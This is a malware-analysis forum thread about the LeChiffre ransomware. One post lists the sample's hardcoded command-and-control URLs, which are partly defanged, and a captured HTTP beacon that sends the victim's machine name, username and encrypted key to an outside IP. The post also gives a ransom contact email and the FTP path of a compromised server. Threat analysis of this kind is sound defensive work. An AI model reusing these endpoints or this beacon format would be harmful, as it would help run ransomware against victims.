Ransom.LeChiffre

Forum for analysis and discussion about malware.

Ransom.LeChiffre

Postby Xylitol » Mon Jan 25, 2016 12:47 pm

You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: Ransom.LeChiffre

Postby p1nk » Mon Jan 25, 2016 3:45 pm

I'm seeing a bunch of hard coded control server paths:

hxtp://184.107.251.146/sipvoice.php?cha ... =&comment=
hxtp://184.107.251.146/sipvoice.php?insert=&servername=
hxtp://184.107.251.146/sipvoice.php?shutdown=&reason=
hxtp://184.107.251.146/sipvoice.php?update=&finished=
hxtp://184.107.251.146/sipvoice.php?updqua=&quantity=

Network:

GET /sipvoice.php?insert=&servername=Sandbox&username=Administrator&started=25.01.16 10:41&secretcode=b8rEq0zv69Tov31yu40fzcmkPS0/Jy7RJYnM1SQoPJzJKTJyGu9eDBckvcS3baP2qRd0BDAy0k/vGuwhsl34GFSg2o/q1dWzQcmHBCYBUWKR4A5zBBtJti1VQDxJbBn9c46H/xgSHevRay8Z3imFp7rZdRbqDDrWNvH7UvX/fijK2HEpHD2cMlyjWZN5uCXphfiUm+UF5CCfwYF7g6Ll2zDc3snOYGy6VTacIzJVC+4BM5zCeTQKlbRmj9jXlnom&email=decrypt.my.files@gmail.com&session=rihsdhieLENrlXaRYaqojfDpyTKFpnFE&patched=0 HTTP/1.0
Host: 184.107.251.146
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)


/sipvoice.php?
insert=
servername=Sandbox
username=Administrator
started=25.01.16 10:41
secretcode=b8rEq0zv69Tov31yu40fzcmkPS0/Jy7RJYnM1SQoPJzJKTJyGu9eDBckvcS3baP2qRd0BDAy0k/vGuwhsl34GFSg2o/q1dWzQcmHBCYBUWKR4A5zBBtJti1VQDxJbBn9c46H/xgSHevRay8Z3imFp7rZdRbqDDrWNvH7UvX/fijK2HEpHD2cMlyjWZN5uCXphfiUm+UF5CCfwYF7g6Ll2zDc3snOYGy6VTacIzJVC+4BM5zCeTQKlbRmj9jXlnom
email=decrypt.my.files@gmail.com
session=rihsdhieLENrlXaRYaqojfDpyTKFpnFE
patched=0



--------------------------

Also looks like the following was pwned:
Code: Select all
ftp://200.27.90.24/_help%20to%20decrypt%20LeChiffre%20for%20[RESPALDO]%20l.html
Last edited by Xylitol on Mon Jan 25, 2016 3:56 pm, edited 1 time in total.
Reason: links obfuscation
User avatar
p1nk
 
Posts: 39
Joined: Thu Oct 29, 2015 1:09 am
Reputation point: 2


Return to Malware

Who is online

Users browsing this forum: No registered users and 10 guests